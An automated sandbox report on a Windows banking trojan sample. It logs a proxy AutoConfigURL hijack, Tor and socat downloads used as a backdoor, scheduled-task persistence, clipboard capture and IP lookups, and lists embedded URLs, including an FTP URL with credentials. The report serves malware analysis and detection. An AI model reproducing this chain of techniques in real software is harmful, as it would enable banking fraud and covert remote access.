Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:446656
Start time:12:33:14
Joe Sandbox Product:Cloud
Start date:27.11.2017
Overall analysis duration:0h 13m 18s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:bbtsvbq.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 with additional language packs (German, French, Swedish, Norwegian), Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 62, Firefox 36)
Number of analysed new started processes analysed:40
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal100.evad.expl.spyw.bank.troj.winEXE@57/102@11/16
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 71
  • Number of non-executed functions: 92
EGA Information:
  • Successful, ratio: 75%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 96%)
  • Quality average: 84.6%
  • Quality standard deviation: 25.9%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Execution Graph export aborted for target mshta.exe, PID 2692 because there are no executed function
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: bbtsvbq.exevirustotal: Detection: 60%Perma Link

Cryptography:

barindex
Public key (encryption) foundShow sources
Source: tor.exeBinary or memory string: -----BEGIN RSA PUBLIC KEY-----

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

barindex
Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically)Show sources
Source: C:\Users\user\Desktop\bbtsvbq.exeRegistry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings AutoConfigURL http://127.0.0.1:5555/mmlhKC7c.js?ip=62.210.13.58

Networking:

barindex
Contains functionality to download additional files from the internetShow sources
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeCode function: 19_2_0040C6C3 recv,__errno,__errno,19_2_0040C6C3
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: powershell.exeString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exeString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exeString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: api.nuget.org
Urls found in memory or binary dataShow sources
Source: powershell.exeString found in binary or memory: file://
Source: powershell.exeString found in binary or memory: file:///
Source: powershell.exeString found in binary or memory: file:///C:/ProgramData/C4CqRww6.ps1
Source: powershell.exeString found in binary or memory: file:///C:/ProgramData/C4CqRww6.ps1Z(
Source: mshta.exeString found in binary or memory: file:///C:/ProgramData/VitBTKxRu/Tor/tor.exe
Source: mshta.exeString found in binary or memory: file:///C:/ProgramData/VitBTKxRu/Tor/tor.exeoso
Source: powershell.exeString found in binary or memory: file:///C:/Users/user~1/AppData/Local/Temp/2HVmGbfK7qLuRZ/lib/net20/Microsoft.Win32.TaskScheduler.
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/Wi
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/b
Source: bbtsvbq.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
Source: bbtsvbq.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exeP
Source: bbtsvbq.exeString found in binary or memory: file:///C:/Windows/System32/cmd.exe
Source: bbtsvbq.exeString found in binary or memory: file:///C:/Windows/System32/taskkill.exe
Source: powershell.exeString found in binary or memory: file:///C:/Windows/system32/cmd.exe
Source: powershell.exeString found in binary or memory: file:///C:/Windows/system32/cmd.exe:
Source: bbtsvbq.exe, o8NqEAtZ.ps1.1.drString found in binary or memory: ftp://coop-mp:klyn65te
Source: powershell.exeString found in binary or memory: http://
Source: powershell.exeString found in binary or memory: http://12
Source: powershell.exe, user-PC.log.5.dr, unknown.4.drString found in binary or memory: http://127.0.0.1:5555
Source: powershell.exe, C4CqRww6.ps1.1.drString found in binary or memory: http://127.0.0.1:5555/
Source: powershell.exeString found in binary or memory: http://127.0.0.1:5555/0dTRgfA.asp?ts&
Source: powershell.exe, taskeng.exe, user-PC.log.5.dr, unknown.4.drString found in binary or memory: http://127.0.0.1:5555/0dTRgfA.asp?ts&ip=
Source: taskeng.exeString found in binary or memory: http://127.0.0.1:5555/0dTRgfA.asp?ts&ip=
Source: powershell.exeString found in binary or memory: http://127.0.0.1:5555/0dTp
Source: bbtsvbq.exeString found in binary or memory: http://127.0.0.1:5555/kqHogqjb.js?ip=62.210.13.58D
Source: powershell.exeString found in binary or memory: http://api.
Source: powershell.exe, user-PC.log.5.dr, unknown.4.drString found in binary or memory: http://api.ipify
Source: taskeng.exe, user-PC.log.5.dr, C4CqRww6.ps1.1.dr, unknown.4.drString found in binary or memory: http://api.ipify.org/
Source: bbtsvbq.exeString found in binary or memory: http://api.ipify.org/.exe
Source: bbtsvbq.exeString found in binary or memory: http://api.ipify.org/l
Source: powershell.exeString found in binary or memory: http://cacerts.digicer
Source: powershell.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: powershell.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: powershell.exeString found in binary or memory: http://certificates.godaddy.com/repository/0
Source: powershell.exeString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: powershell.exeString found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exeString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: powershell.exeString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exeString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exeString found in binary or memory: http://crl.godaddy.com/gdig2s1-499.crl0
Source: powershell.exeString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: powershell.exeString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: powershell.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exeString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exeString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: powershell.exeString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: powershell.exeString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g1.crl04
Source: powershell.exeString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g5.crl04
Source: powershell.exeString found in binary or memory: http://crl4.digicert.com
Source: powershell.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: powershell.exeString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g1.crl0K
Source: powershell.exeString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g5.crl0L
Source: powershell.exeString found in binary or memory: http://crl4.digicert.com/sha2-ha-server0
Source: powershell.exeString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: powershell.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enQ
Source: powershell.exeString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: TaskScheduler.nuspec.6.drString found in binary or memory: http://download-codeplex.sec.s-msft.com/Download?ProjectName=taskscheduler&DownloadId=885310
Source: powershell.exeString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exeString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exeString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: bbtsvbq.exeString found in binary or memory: http://icanhazip.com/
Source: bbtsvbq.exeString found in binary or memory: http://icanhazip.com/=
Source: powershell.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exeString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exeString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exeString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exeString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exeString found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exeString found in binary or memory: http://ocsp.digicert.com0K
Source: powershell.exeString found in binary or memory: http://ocsp.digicert.com0M
Source: powershell.exeString found in binary or memory: http://ocsp.digicert.com0R
Source: powershell.exeString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exeString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exeString found in binary or memory: http://ocsp.godaddy.com/0
Source: powershell.exeString found in binary or memory: http://ocsp.godaddy.com/02
Source: powershell.exeString found in binary or memory: http://ocsp.godaddy.com/05
Source: powershell.exeString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exeString found in binary or memory: http://ocsp.msocsp.com0
Source: README.15.drString found in binary or memory: http://repo.or.cz/r/socat.git
Source: powershell.exeString found in binary or memory: http://schem
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: powershell.exeString found in binary or memory: http://schemas.m
Source: powershell.exeString found in binary or memory: http://st
Source: TaskScheduler.nuspec.6.drString found in binary or memory: http://taskscheduler.codeplex.com/
Source: TaskScheduler.nuspec.6.drString found in binary or memory: http://taskscheduler.codeplex.com/license
Source: powershell.exeString found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exeString found in binary or memory: http://www.acabogacia.org0
Source: powershell.exeString found in binary or memory: http://www.comsign.co.il/cps0
Source: FAQ.15.drString found in binary or memory: http://www.cygwin.com/
Source: README.15.dr, README.md.15.drString found in binary or memory: http://www.dest-unreach.org/socat/
Source: powershell.exeString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exeString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: tor.exeString found in binary or memory: http://www.openssl.org/V
Source: tor.exeString found in binary or memory: http://www.openssl.org/support/faq.html
Source: tor.exeString found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
Source: powershell.exeString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: powershell.exeString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: powershell.exeString found in binary or memory: http://www.usertrust.com1
Source: README.15.drString found in binary or memory: http://www.xs4all.nl/~jantien/yodl/)
Source: tor.exe, zlib1.dll.10.drString found in binary or memory: http://www.zlib.net/D
Source: README.15.drString found in binary or memory: http://yodl.sourceforge.net/
Source: powershell.exeString found in binary or memory: https://api.github.com/_private/browser/errors
Source: powershell.exeString found in binary or memory: https://api.nuget.org
Source: powershell.exe, user-PC.log.5.dr, C4CqRww6.ps1.1.dr, unknown.4.drString found in binary or memory: https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg
Source: powershell.exeString found in binary or memory: https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg8
Source: powershell.exeString found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, C4CqRww6.ps1.1.drString found in binary or memory: https://chocolatey.org/7za.exe
Source: powershell.exeString found in binary or memory: https://chocolatey.org/7za.exe8
Source: powershell.exeString found in binary or memory: https://chocolatey.orgx&
Source: powershell.exeString found in binary or memory: https://codeload.github.com/StudioEtrange/socat-windows/zip/1.7.2.1
Source: powershell.exeString found in binary or memory: https://codeload.github.comx&
Source: bbtsvbq.exe, powershell.exe, C4CqRww6.ps1.1.drString found in binary or memory: https://dist.torproject.org/
Source: powershell.exeString found in binary or memory: https://dist.torproject.org/8
Source: user-PC.log.5.dr, unknown.4.drString found in binary or memory: https://dist.torproject.org/torbrowser/7.0.8/tor-win32-0.3.1.7.zip
Source: powershell.exeString found in binary or memory: https://dist.torproject.org/torbrowser/7.0.8/tor-win32-0.3.1.7.zipTt
Source: powershell.exeString found in binary or memory: https://dist.torproject.orgx&
Source: bbtsvbq.exeString found in binary or memory: https://github.com/StudioEtrange/socat-w
Source: powershell.exe, find.exe, user-PC.log.5.dr, C4CqRww6.ps1.1.dr, unknown.4.drString found in binary or memory: https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip
Source: powershell.exeString found in binary or memory: https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip8
Source: powershell.exeString found in binary or memory: https://github.comx&
Source: powershell.exeString found in binary or memory: https://render.githubusercontent.com
Source: powershell.exeString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, Microsoft.Win32.TaskScheduler.resources.dll2.6.dr, Microsoft.Win32.TaskScheduler.resources.dll10.6.dr, Microsoft.Win32.TaskScheduler.resources.dll9.6.dr, Microsoft.Win32.TaskScheduler.resources.dll14.6.dr, Microsoft.Win32.TaskScheduler.resources.dll7.6.dr, Microsoft.Win32.TaskScheduler.resources.dll3.6.dr, Microsoft.Win32.TaskScheduler.resources.dll0.6.dr, Microsoft.Win32.TaskScheduler.resources.dll13.6.dr, Microsoft.Win32.TaskScheduler.resources.dll5.6.dr, Microsoft.Win32.TaskScheduler.resources.dll6.6.dr, Microsoft.Win32.TaskScheduler.resources.dll17.6.dr, Microsoft.Win32.TaskScheduler.resources.dll15.6.dr, Microsoft.Win32.TaskScheduler.resources.dll16.6.dr, Microsoft.Win32.TaskScheduler.resources.dll.6.dr, Microsoft.Win32.TaskScheduler.resources.dll1.6.dr, Microsoft.Win32.TaskScheduler.resources.dll4.6.dr, Microsoft.Win32.TaskScheduler.resources.dll18.6.dr, Microsoft.Win32.TaskScheduler.resources.dll11.6.dr, Microsoft.Win32.TaskScheduler.resources.dll8.6.dr, Microsoft.Win32.TaskScheduler.resources.dll12.6.drString found in binary or memory: https://taskscheduler.codeplex.com/
Source: powershell.exe, Microsoft.Win32.TaskScheduler.dll.6.dr, Microsoft.Win32.TaskScheduler.dll2.6.dr, Microsoft.Win32.TaskScheduler.dll1.6.drString found in binary or memory: https://taskscheduler.codeplex.com/F
Source: Microsoft.Win32.TaskScheduler.resources.dll2.6.dr, Microsoft.Win32.TaskScheduler.resources.dll10.6.dr, Microsoft.Win32.TaskScheduler.resources.dll9.6.dr, Microsoft.Win32.TaskScheduler.resources.dll14.6.dr, Microsoft.Win32.TaskScheduler.resources.dll7.6.dr, Microsoft.Win32.TaskScheduler.resources.dll3.6.dr, Microsoft.Win32.TaskScheduler.resources.dll0.6.dr, Microsoft.Win32.TaskScheduler.resources.dll13.6.dr, Microsoft.Win32.TaskScheduler.resources.dll5.6.dr, Microsoft.Win32.TaskScheduler.resources.dll6.6.dr, Microsoft.Win32.TaskScheduler.resources.dll17.6.dr, Microsoft.Win32.TaskScheduler.resources.dll15.6.dr, Microsoft.Win32.TaskScheduler.resources.dll16.6.dr, Microsoft.Win32.TaskScheduler.resources.dll.6.dr, Microsoft.Win32.TaskScheduler.resources.dll1.6.dr, Microsoft.Win32.TaskScheduler.resources.dll4.6.dr, Microsoft.Win32.TaskScheduler.resources.dll18.6.dr, Microsoft.Win32.TaskScheduler.resources.dll11.6.dr, Microsoft.Win32.TaskScheduler.resources.dll8.6.dr, Microsoft.Win32.TaskScheduler.resources.dll12.6.drString found in binary or memory: https://taskscheduler.codeplex.com/H
Source: bbtsvbq.exe, powershell.exe, C4CqRww6.ps1.1.drString found in binary or memory: https://tor.ybti.net/dist/
Source: powershell.exeString found in binary or memory: https://tor.ybti.net/dist/8
Source: powershell.exe, C4CqRww6.ps1.1.drString found in binary or memory: https://torproject.mirror.metalgamer.eu/dist/
Source: powershell.exeString found in binary or memory: https://torproject.mirror.metalgamer.eu/dist/8
Source: powershell.exeString found in binary or memory: https://torproject.urown.net
Source: powershell.exe, C4CqRww6.ps1.1.drString found in binary or memory: https://torproject.urown.net/dist/
Source: powershell.exeString found in binary or memory: https://torproject.urown.net/dist/8
Source: bitsadmin.exe, user-PC.log.5.dr, unknown.4.drString found in binary or memory: https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip
Source: cmd.exe, bitsadmin.exeString found in binary or memory: https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zipC:
Source: powershell.exeString found in binary or memory: https://www.digicert.com/CPS0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
Connects to several IPs in different countriesShow sources
Source: unknownNetwork traffic detected: IP country count 10
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.91:49172 -> 31.171.155.108:9001
Source: global trafficTCP traffic: 192.168.1.91:49180 -> 212.47.234.212:9001
Source: global trafficTCP traffic: 192.168.1.91:49182 -> 208.80.154.39:9002
Source: global trafficTCP traffic: 192.168.1.91:49183 -> 54.36.205.38:9001
Installs TOR (Internet Anonymizer)Show sources
Source: C:\ProgramData\7za.exeFile created: C:\ProgramData\VitBTKxRu\Tor\tor.exe
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org

Boot Survival:

barindex
Installs Task Scheduler Managed WrapperShow sources
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\Microsoft.Win32.TaskScheduler.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\Microsoft.Win32.TaskScheduler.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\Microsoft.Win32.TaskScheduler.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\Microsoft.Win32.TaskScheduler.dll

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeCode function: 19_2_0040C103 bind,__errno,__errno,19_2_0040C103
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeCode function: 19_2_0040C24D listen,__errno,__errno,19_2_0040C24D
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeCode function: 19_1_0040C103 bind,__errno,__errno,19_1_0040C103
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeCode function: 19_1_0040C24D listen,__errno,__errno,19_1_0040C24D

Persistence and Installation Behavior:

barindex
Installs CygwinShow sources
Source: C:\ProgramData\7za.exeFile created: C:\ProgramData\VitBTKxRu\socat-windows-1.7.2.1\cygwin1.dll
Drops PE filesShow sources
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\ProgramData\VitBTKxRu\socat-windows-1.7.2.1\cygwrap-0.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\7za.exe
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\9kehql3e.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeFile created: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
